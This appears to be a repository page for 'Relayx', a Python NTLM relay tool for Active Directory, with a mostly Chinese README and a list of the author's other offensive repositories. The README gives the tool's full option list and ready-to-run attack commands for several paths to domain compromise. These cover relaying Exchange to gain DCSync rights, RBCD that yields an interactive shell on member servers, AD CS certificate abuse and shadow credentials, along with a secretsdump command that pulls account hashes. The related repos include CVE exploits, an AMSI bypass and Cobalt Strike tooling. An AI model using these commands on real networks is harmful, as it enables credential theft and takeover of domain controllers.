• Stars
    star
    156
  • Rank 239,589 (Top 5 %)
  • Language
    Python
  • Created over 3 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

NTLM relay test.

Relayx

声明

一切开发旨在学习,请勿用于非法用途

Usage

将几个比较好用的relay集成到了一起,提高测试效率。

DCpwn with ntlmrelay

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address> or LOCAL (if you want to parse local files)

optional arguments:
  -h, --help            show this help message and exit
  -r CALLBACK_IP, --callback-ip CALLBACK_IP
                        Attacker callback IP
  --timeout TIMEOUT     timeout in seconds
  --debug               Enable debug output
  -ts                   Adds timestamp to every logging output
  --no-trigger          Start exploit server without trigger.
  --no-attack           Start trigger for test.
  --smb-port SMB_PORT   Port to listen on smb server
  -rpc-smb-port [destination port]
                        Destination port to connect to SMB Server

authentication:
  -hashes LMHASH:NTHASH
                        Hash for account auth (instead of password)

connection:
  -dc-ip ip address     IP address of the Domain Controller
  -adcs-ip ip address   IP Address of the ADCS, if unspecified, dc ip will be used
  --ldap                Use ldap.
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot
                        resolve it

attack:
  -m {rbcd,pki,sdcd}, --method {rbcd,pki,sdcd}
                        Set up attack method, rbcd or pki or sdcd (shadow credential)
  -t {printer,efs}, --trigger {printer,efs}
                        Set up trigger method, printer or petitpotam
  --impersonate IMPERSONATE
                        target username that will be impersonated (thru S4U2Self) for quering the ST. Keep in mind this will only work if the identity provided in this scripts is
                        allowed for delegation to the SPN specified
  --add-computer [COMPUTERNAME]
                        Attempt to add a new computer account
  -pipe {efsr,lsarpc,samr,netlogon,lsass}
                        Named pipe to use (default: lsarpc)
  --template TEMPLATE   AD CS template. If you are attacking Domain Controller or other windows server machine, default value should be suitable.
  -pp PFX_PASS, --pfx-pass PFX_PASS
                        PFX password.
  -ssl                  This is useful when AD CS use ssl.

execute:
  -share SHARE          share where the output will be grabbed from (default ADMIN$)
  -shell-type {cmd,powershell}
                        choose a command processor for the semi-interactive shell
  -codec CODEC          Sets encoding used (codec) from the target's output (default "GBK").

认证触发

工具中包含了两种触发机器回连的操作。 printerbug 和 PetitPotam。 触发可通过指定参数来实现,默认使用printerbug

-t printer  # 使用 打印机bug  触发
-t efs      # 使用 MS-EFSRPC 触发

如果不需要工具主动去触发回连,可以添加参数--no-trigger,这样就可以通过其他方式来进行触发,同样的,可以添加参数--no-attack来指定只触发回连。

攻击场景

目前支持三种攻击方式

-m rbcd     # 普通域成员RBCD,高权限,添加Dcsync权限
-m pki      # 向AD CS申请证书
-m sdcd     # 通过ldap添加 msDS-KeyCredentialLink 属性进行攻击,需要 Server >= 2016

一、攻击Exchange服务器

默认Exchange的服务权限较高,所以工具会利用Exchange的权限将当前用户增加Dcsync权限。

python relayx.py cgdomain.com/sanfeng:'1qaz@WSX'@10.211.55.201 -r 10.211.55.2 -dc-ip 10.211.55.200

目标的方式可以使用impacket的方式来写,@后跟目标即可,-r 是回连IP,也就是我们的攻击IP,-dc-ip 指定要去认证或者请求的DC ip, 后面一样,就不再重复。

攻击之后,当前用户可进行dcsync:

secretsdump.py cgdomain.com/sanfeng:'1qaz@WSX'@10.211.55.200 -just-dc-user cgdomain\\exchange$

使用aclpwn可进行还原(这里需要exchange服务器的机器账号hash):

aclpwn -r aclpwn-xxxxx-xxxxx.restore

二、攻击域成员机器

攻击普通服务器会自动使用RBCD(基于资源的约束委派)来攻击,所以这里需要域级别>= Server2012R2。

python relayx.py cgdomain.com/sanfeng:'1qaz@WSX'@10.211.55.202 -r 10.211.55.2 -dc-ip 10.211.55.203

攻击成功后,会自动获取一个交互式shell,并会生成一个ccache文件供以后使用,这里默认会模拟administrator的身份,如果不存在administrator,可通过--impersonate 来指定目标用户。

这里默认会添加一个新的计算机账号,可通过--add-computer 来指定机器名,不指定则为随机名。

三、攻击AD CS

这里要求目标环境安装了AD CS。攻击AD CS 可以通过-m pki 来指定。

python relayx.py cgdomain.com/sanfeng:'1qaz@WSX'@10.211.55.202 -r 10.211.55.2 -dc-ip 10.211.55.200 -m pki

这里会向CS申请一个机器账号的证书,之后通过Rubues进行后续攻击即可。

四、利用msDS-KeyCredentialLink

类似于RBCD,优点是不需要添加计算机账号,缺点是需要Server版本高于2016, 可通过-m sdcd 来指定。

python relayx.py cgdomain.com/sanfeng:'1qaz@WSX'@10.211.55.202 -r 10.211.55.2 -dc-ip 10.211.55.200 -m sdcd

本地没2016环境。所以会报个错。

后续可通过Rubues进行后续攻击。

More Repositories

1

Intranet_Penetration_Tips

2018年初整理的一些内网渗透TIPS,后面更新的慢,所以整理出来希望跟小伙伴们一起更新维护~
4,089
star
2

noPac

Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
Python
567
star
3

CVE-2017-11882

CVE-2017-11882 from https://github.com/embedi/CVE-2017-11882
Python
531
star
4

Pentest

tools
C
524
star
5

Exchange2domain

CVE-2018-8581
Python
358
star
6

cve-2020-0688

cve-2020-0688
Python
315
star
7

acefile

POC of https://research.checkpoint.com/extracting-code-execution-from-winrar/
Python
270
star
8

CVE-2019-1040

CVE-2019-1040 with Exchange
Python
237
star
9

Mailget

通过脉脉用户猜测企业邮箱
Python
227
star
10

get_ip_by_ico

从shodan获取使用了相同favicon.ico的网站
Python
190
star
11

CVE-2018-15982_EXP

exp of CVE-2018-15982
Python
181
star
12

PySQLTools

Mssql利用工具
Python
165
star
13

RTF_11882_0802

PoC for CVE-2018-0802 And CVE-2017-11882
Python
164
star
14

owa_info

获取Exchange信息的小工具
Python
160
star
15

CS_Chinese_support

Cobalt strike 修改支持回显中文。
145
star
16

MyJSRat

This is JSRat.ps1 in Python
Python
134
star
17

AMSI_bypass

XSLT
78
star
18

SharpAddDomainMachine

SharpAddDomainMachine
C#
68
star
19

proxyshell_payload

proxyshell payload generate
Python
67
star
20

cs_custom_404

Cobalt strike custom 404 page
HTML
61
star
21

GhostPotato

Just pick out the code we need.
Python
52
star
22

pyForgeCert

pyForgeCert is a Python equivalent of the ForgeCert.
Python
51
star
23

DomainHiding

external c2 use domainhiding.
Go
48
star
24

hackredis

Python
42
star
25

p12tool

A simple Go script to brute force or parse a password-protected PKCS#12 (PFX/P12) file.
Go
39
star
26

MSSQL_CLR

MSSQL CLR for pentest.
C#
35
star
27

CVE-2019-1040-dcpwn

CVE-2019-1040 with Kerberos delegation
Python
32
star
28

WebDAV

Set Up WebDAV Server for Remote File Sharing and more
Shell
31
star
29

warp_proxy

cloudflare socks5 server
Shell
31
star
30

atexec-pro

Fileless atexec, no more need for port 445
Python
29
star
31

tshtun

Py写的tsh的流量加解密过程。
C
25
star
32

xslt_poc

Execute codes From XSLT
XSLT
17
star
33

mousejack_replay

mousejack hack
Python
11
star
34

Python_Codes

some python codes
Python
9
star
35

Cortana

Some Cortana scripts
Ruby
3
star
36

comment

orz..
2
star
37

gitTun

GIt tun
Python
1
star
38

Ridter

1
star